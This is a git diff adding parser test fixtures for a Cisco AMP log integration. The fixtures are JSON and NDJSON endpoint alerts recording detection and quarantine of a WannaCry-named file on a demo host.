+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782276",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500240848Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782275",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500242912Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782274",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500244968Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782273",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500247029Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782272",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500249078Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782271",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500251139Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782270",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500253189Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419229335730782000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419229331435814969",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log
new file mode 100644
index 00000000000..6ccff00d38b
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log
@@ -0,0 +1,53 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
